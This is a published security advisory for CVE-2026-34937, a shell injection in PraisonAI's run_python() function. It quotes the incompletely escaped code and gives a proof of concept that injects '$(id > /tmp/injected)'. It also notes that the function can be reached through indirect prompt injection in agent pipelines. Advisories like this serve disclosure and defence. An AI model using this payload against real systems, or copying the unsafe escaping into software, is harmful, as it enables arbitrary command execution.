PraisonAI: Shell Injection in run_python() via Unescaped $() Substitution

CVE-2026-34937 → View on GitHub ↗ View on CVE.org ↗ View on NVD ↗

Description

Summary

run_python() in praisonai constructs a shell command string by interpolating user-controlled code into python3 -c "<code>" and passing it to subprocess.run(..., shell=True). The escaping logic only handles \ and ", leaving $() and backtick substitutions unescaped, allowing arbitrary OS command execution before Python is invoked.

Details

execute_command.py:290 (source) -> execute_command.py:297 (hop) -> execute_command.py:310 (sink)

# source -- user-controlled code argument
def run_python(code: str, cwd=None, timeout=60):

# hop -- incomplete escaping, $ and () not handled
    escaped_code = code.replace('\\', '\\\\').replace('"', '\\"')
    command = f'{python_cmd} -c "{escaped_code}"'

# sink -- shell=True expands $() before python3 runs
    return execute_command(command=command, cwd=cwd, timeout=timeout)
    # execute_command calls subprocess.run(command, shell=True, ...)

PoC

# tested on: praisonai==0.0.81 (source install, commit HEAD 2026-03-30)
# install: pip install -e src/praisonai
import sys
sys.path.insert(0, 'src/praisonai')
from praisonai.code.tools.execute_command import run_python

result = run_python(code='$(id > /tmp/injected)')
print(result)

# verify
import subprocess
print(subprocess.run(['cat', '/tmp/injected'], capture_output=True, text=True).stdout)
# expected output: uid=1000(narey) gid=1000(narey) groups=1000(narey)...

Impact

Any agent pipeline or API consumer that passes user or task-supplied content to run_python() is exposed to full OS command execution as the process user. The function is reachable via indirect prompt injection and the auto-generated Flask server deploys with AUTH_ENABLED = False by default when no token is configured.

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Open repository advisory ↗
Source code
Browse source ↗
Published (advisory)
2026-04-01 23:18:17 UTC
Updated
2026-04-06 22:54:10 UTC
GitHub reviewed
2026-04-01 23:18:17 UTC
NVD published
2026-04-03 23:17:06 UTC

EPSS Score

Score Percentile
0.07% 21.63%

CVSS Scores

Base score Version Severity Vector
7.8 3.1
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H Click to expand
Attack vector (AV:L)
They already need access on the box, or another person has to do something wrong; it’s not a remote drive-by.
Attack complexity (AC:L)
Once they can reach the bug, pulling it off is straightforward—no weird race conditions or rare setup.
Privileges required (PR:L)
A normal user session is enough; they don’t have to be admin.
User interaction (UI:N)
Nobody has to click “OK” or open a trap file; it can work without a victim helping.
Scope (S:U)
Damage stays in the same “trust bubble” as the broken component—no big spill into unrelated systems.
Confidentiality (C:H)
Serious risk that confidential data gets exposed in a big way.
Integrity (I:H)
They could widely tamper with or forge data—trust in the data is badly hurt.
Availability (A:H)
Could take the service down hard or make it unusable for people who depend on it.

Identifiers

Type Value
GHSA GHSA-w37c-qqfp-c67f ↗
CVE CVE-2026-34937 ↗

CWEs

CWE id Name
CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Credits

  • YeranG30 (reporter)

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
pip praisonaiagents <= 1.5.89 1.5.90

References

cvelogic Threat Intelligence